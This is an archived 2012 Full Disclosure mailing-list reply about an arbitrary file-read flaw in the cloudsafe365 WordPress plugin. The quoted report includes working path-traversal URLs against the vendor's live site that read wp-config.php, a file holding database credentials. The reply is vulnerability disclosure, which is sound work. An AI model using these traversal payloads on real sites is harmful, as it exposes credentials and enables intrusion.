Full Disclosure mailing list archives
Re: cloudsafe365 for wordpress: file disclosure
From: Henri Salo <henri () nerv fi>
Date: Tue, 28 Aug 2012 11:50:15 +0300
On Tue, Aug 28, 2012 at 10:29:46AM +0200, Jan van Niekerk wrote:
This wordpress security plugin lets you read arbitrary files on the system. Looking at the code, there will be plenty of stuff like this. Demo: http://www.cloudsafe365.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-config.php http://www.cloudsafe365.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-login.php Disclosure timeline: * Today: visit wordpress.org * Try to report bug * System wants login * Visit web site: vendor has no e-mail address and stupid one-liner contact form and hidden name * Stuff it, I'm not going to phone them
I can verify and report this. Could you list all the vulnerabilities you can find from the plugin? You can also contact plugins () wordpress org address in case you found vulnerabilities from WordPress plugins in the future. - Henri Salo _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- cloudsafe365 for wordpress: file disclosure Jan van Niekerk (Aug 28)
- Re: cloudsafe365 for wordpress: file disclosure Henri Salo (Aug 28)
- Re: cloudsafe365 for wordpress: file disclosure Christian Sciberras (Aug 28)
- Re: cloudsafe365 for wordpress: file disclosure Henri Salo (Aug 28)
- Re: cloudsafe365 for wordpress: file disclosure Ivan Carlos (Aug 28)
- Re: cloudsafe365 for wordpress: file disclosure Christian Sciberras (Aug 28)
- Re: cloudsafe365 for wordpress: file disclosure Henri Salo (Aug 28)
- Re: cloudsafe365 for wordpress: file disclosure craig deveson (Aug 28)